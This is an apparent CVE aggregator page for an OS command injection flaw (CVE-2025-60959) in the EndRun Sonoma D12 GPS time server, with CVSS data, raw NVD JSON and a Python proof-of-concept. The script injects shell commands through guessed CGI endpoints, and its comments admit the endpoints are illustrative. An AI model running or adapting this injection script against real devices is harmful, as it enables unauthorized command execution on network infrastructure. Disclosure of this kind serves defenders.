Security Vulnerability Report
中文
CVE-2025-60959 CVSS 8.2 HIGH

CVE-2025-60959

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:36:32

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Sonoma D12 F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60959 - EndRun Sonoma D12 OS Command Injection PoC # Author: xDiv-Sec Research Team # Advisory: https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12 import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1" COMMAND = sys.argv[2] if len(sys.argv) > 2 else "id" # Vulnerable endpoint (example - actual parameter may vary) # The vulnerability exists in a CGI script that passes user input to system() # without proper sanitization. payload = f"; {COMMAND} ;" # Example injection points that may be vulnerable: endpoints = [ f"{TARGET}/cgi-bin/support.cgi?query={payload}", f"{TARGET}/cgi-bin/status.cgi?cmd={payload}", f"{TARGET}/admin/ping?host=127.0.0.1{payload}", ] for url in endpoints: try: print(f"[*] Trying: {url}") r = requests.get(url, timeout=10, verify=False) if r.status_code == 200 and "uid=" in r.text: print(f"[+] Command injection successful!") print(r.text) break except Exception as e: print(f"[-] Error: {e}") # Note: Actual exploitation requires identifying the specific vulnerable # parameter. Refer to the official advisory for exact details. # The injection uses shell metacharacters to break out of the intended # command context and execute arbitrary OS commands.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60959", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:06.737", "lastModified": "2025-10-10T16:36:31.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}